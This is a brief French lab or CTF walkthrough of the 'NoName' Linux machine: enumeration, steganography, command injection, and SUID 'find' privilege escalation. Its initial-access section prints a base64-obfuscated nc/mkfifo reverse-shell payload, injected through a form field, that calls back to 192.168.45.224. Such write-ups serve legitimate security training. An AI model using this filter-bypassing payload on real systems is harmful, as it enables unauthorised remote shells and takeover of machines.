NoName

steganographie commande injection base64 suid

  • Nom machine : NoName

  • Difficulté : Intermédiaire

  • OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 06:24 EDT
Nmap scan report for 192.168.228.15
Host is up (0.033s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)

HTTP (80)

Comme l'indique la page, cecei est bien "fake"

En allant sur admin, on tombe sur une page avec des images, en regardant le code source de la page :

passphrase:harder

Nous avons cherché à quoi il sert, en passant par quelque chose de très CTF : la stéganographie. Nous avons téléchargé chaques images sur notre machine.

La passphrase est celui précédement trouvé

Accès initial

Nous allons essayé les différents payloads...

Cela fonctionne ! Maintenant nous allons tenter d'obtenir un reverse shell, mais certains caractères semblent bloquer. Nous allons lire le fichier php. Pour cela on remplace id par "cat superadmin.php" puis nous lisons le code source.

Nous avons dorénavent plus d'informations.

Pour bypass cela, nous allons encoder notre payload en base64, le décoder et l'exécuter.

Nous allons utiliser nc mkfifo de revshells.com.

Le payload : 192.168.45.224 | echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjQ1LjIyNCAxMjM0ID4vdG1wL2Y=' | base64 -d |sh

Elévation des privilèges

find !

https://gtfobins.github.io/gtfobins/find/#suid

Nous sommes root !

Mis à jour